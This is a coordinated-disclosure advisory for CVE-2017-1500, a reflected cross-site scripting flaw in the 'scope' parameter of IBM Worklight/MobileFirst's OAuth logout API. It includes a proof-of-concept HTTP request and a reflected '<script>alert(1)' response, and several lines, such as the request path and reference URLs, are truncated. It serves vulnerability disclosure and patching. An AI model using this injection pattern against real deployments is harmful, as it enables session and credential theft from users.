☾ Reflected Cross-Site Scripting in IBM Worklight OAuth Server Web Api ☽
======== ☾ Table of Contents ☽ ==============================
0. Overview
1. Detailed Description
2. Proof Of Concept
3. Solution
4. Disclosure Timeline
5. Thanks & Acknowledgements
6. References
7. Credits
8. Legal Notices
======== ☾ 0. Overview ☽ ==============================
Release Date:
02 August 2017
Revision:
1.0
Impact:
Cross-Site Scripting (XSS) is a code injection attack that allows
an attacker to execute malicious JavaScript code in a victim's
browser, leading to steal sensitive information's and/or user
credentials.
Severity:
Medium
CVSS Score:
5.4 (CVSS:3.0/AV:N/AC:L/PR:L/UI:R/
CVE-ID:
CVE-2017-1500
Vendor:
IBM
Affected Products:
IBM Worklight Enterprise Edition
IBM MobileFirst Platform Foundation
Affected Versions:
6.1, 6.2, 6.3, 7.0, 7.1, 8.0
Product Description:
Worklight/MobileFirst is IBM's premier mobile application platform.
On the device client app side, WorkLight/MobileFirst provide a
framework to wrap around HTML5 web pages and make them into native
applications.
This approach is popularized by PhoneGap, and is widely used by
developers (such as the GMail team at Google) to create cross
platform mobile applications.
With this approach, most of the user interface is presented in HTML5
web pages, and the native framework provides access to device native
functionalities (e.g., camera and GPS) in the form of JavaScript
functions that can be called within the HTML5 web pages.
On the server side, WorkLight/MobileFirst provides device management
capabilities including a dashboard to view versions of the
application installed on different devices.
It can also manage sending PUSH notification to the devices.
WorkLight/MobileFirst provides developer tools to create
applications using their frameworks.
======== ☾ 1. Detailed Description ☽ ==============================
During a Penetration Test to a mobile application it was found a
Reflected Cross-Site Scripting (XSS) vulnerability.
The mobile application was written by using an IBM security framework,
called WorkLight (or better known MobileFirst).
This vulnerability happens because the framework does not properly
validate the untrusted input in a GET parameter, present in an
authorization function exposed by RESTful Web Api.
In detail the logout functionality return a HTTP 403 Forbidden
if the value of the "scope" parameter is not defined in the
"authenticationConfig.xml" and reflect it without a proper
validation in the response body.
To exploit the vulnerability simply append the payload to the
original value present in the GET parameter "scope".
======== ☾ 2. Proof Of Concept ☽ ==============================
HTTP Request
[[
GET /authorization/v1/
&scope=-WSAuthRealm%22%3E%
&isAjaxRequest=true&x=0.
Host: [UNDISCLOSED]
User-Agent: [USER_AGENT]
Accept: text/html
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=[SESSION_ID]
Connection: close
]]
HTTP Response
[[
HTTP/1.1 403 Forbidden
Content-Type: text/html
Connection: Close
Date: Mon, 29 Aug 2016 16:13:37 GMT
Strict-Transport- Security: max-age=157680000
X-Expires- Orig: None
Cache-Control: max-age=0, must-revalidate, private
Content-Length: 109
Logout failed: The realm 'WSAuthRealm"><script>alert(1)
is not defined in authenticationConfig.xml.
]]
======== ☾ 3. Solution ☽ ==============================
Refer to IBM Security Bulletin C1000316 for patch, upgrade or
suggested workaround information.
See "References" for more details.
======== ☾ 4. Disclosure Timeline ☽ ==============================
29/08/2016 : Discovery of the vulnerability
07/09/2016 : Vulnerability submitted to vendor
09/01/2017 : Request status update to the vendor, fix in progress
27/04/2017 : Request status update to the vendor, fix in progress
01/06/2017 : Request status update to the vendor, fix in progress
11/07/2017 : Request status update to the vendor, fix in progress
21/07/2017 : Vendor release the advisory and solution
21/07/2017 : Request CVE-ID assignment
27/07/2017 : Vendor update the advisory with CVE-ID
01/08/2017 : Public disclosure
======== ☾ 5. Thanks & Acknowledgements ☽ ==============================
IBM PSIRT - Product Security Incident Response Team
Emaze Networks S.p.A. - Assessment Team
======== ☾ 6. References ☽ ==============================
(1) http://www.cve.mitre.org/cgi-
(2) https://www-01.ibm.com/
(3) https://exchange.xforce.
(4) http://cwe.mitre.org/data/
(5) https://www.ibm.com/blogs/
(6) https://www.emaze.net/
======== ☾ 7. Credits ☽ ==============================
This vulnerability was discovered and reported by:
Gabriele 'matrix' Gristina (gabriele DOT gristina AT gmail DOT com)
Contacts:
https://www.linkedin.com/in/
https://twitter.com/gm4tr1x
https://github.com/matrix/
======== ☾ 8. Legal Notices ☽ ==============================
Copyright (c) 2017 Gabriele 'matrix' Gristina
Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without mine express
written consent. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please email me for permission.
Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information.
Use of the information constitutes acceptance for use in an AS IS
condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of,
or reliance on,this information.
Komentarų nėra:
Rašyti komentarą